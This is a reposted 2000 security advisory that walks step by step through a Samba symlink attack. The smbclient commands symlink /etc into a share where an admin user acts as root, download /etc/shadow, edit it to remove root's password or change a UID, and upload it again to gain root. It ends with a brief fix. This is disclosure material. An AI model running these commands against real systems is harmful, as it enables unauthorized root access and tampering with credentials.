Advisories : Symlink attack in (all?) Samba

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Symlink attack in (all?) Samba

Title:	Symlink attack in (all?) Samba
Released by:	Tozz
Date:	14th December 2000
Printable version:	Click here

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz

=================================================================



Requirements:



* Shell access or any other way to create symlinks

* A running samba deamon

* The username and/or password of a user named in the

  admin lists in one or more shares.

* Brains are not required.



By default, Samba (http://www.samba.org) followes symlinks, which can lead

to

root promises. Here is an example:



I have a guy that sorts out all my uploads through SMB, he has 'admin'

access

(admin users = username).. This means he will work as UID 0 (root).



e.g. we have this share in /etc/smb.conf



[uploads]

 path = /home/ftp/incoming

 comment = Uploads that came through anon ftp

 guest ok = no

 writeable = no

 force create mode = 0755

 force directory mode = 0755

 admin users = warezmaster



Login to the shell, or find some other way to create symlinks

and create a symlink in /home/ftp/incoming

you do something like



ln /etc -s



now type on you're box (local or remote works both):

smbclient file://foobar.com/uploads -U warezmaster

it will ask for a password, enter it and you will get something like



smb\:>



There we go



smb\:>cd etc

smb\:>get shadow

smb\:>exit



[root@embrace /root]

now you downloaded the shadow file on you're localbox

edit it, change you're UID to 0, or remove the password

from the root account (no password required at logon)



login with smbclient again



smbclient file://foobar.com/uploads -U warezmaster

enter the password



and reupload



smb\:>cd etc

smb\:>put shadow

smb\:>exit



that's it, now login to the shell, if you changed you're own uid

you are now root. If you removed the password from root account

just su to it and you wont need a password.



Note:



The 'Follow Symlinks' can be turned off, but it's on by default.





Fix:



Disable Follow Symlinks





Bye,

Tozz (tozz@hackers4hackers.org)



You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz

or MemoServ me when I'm not online.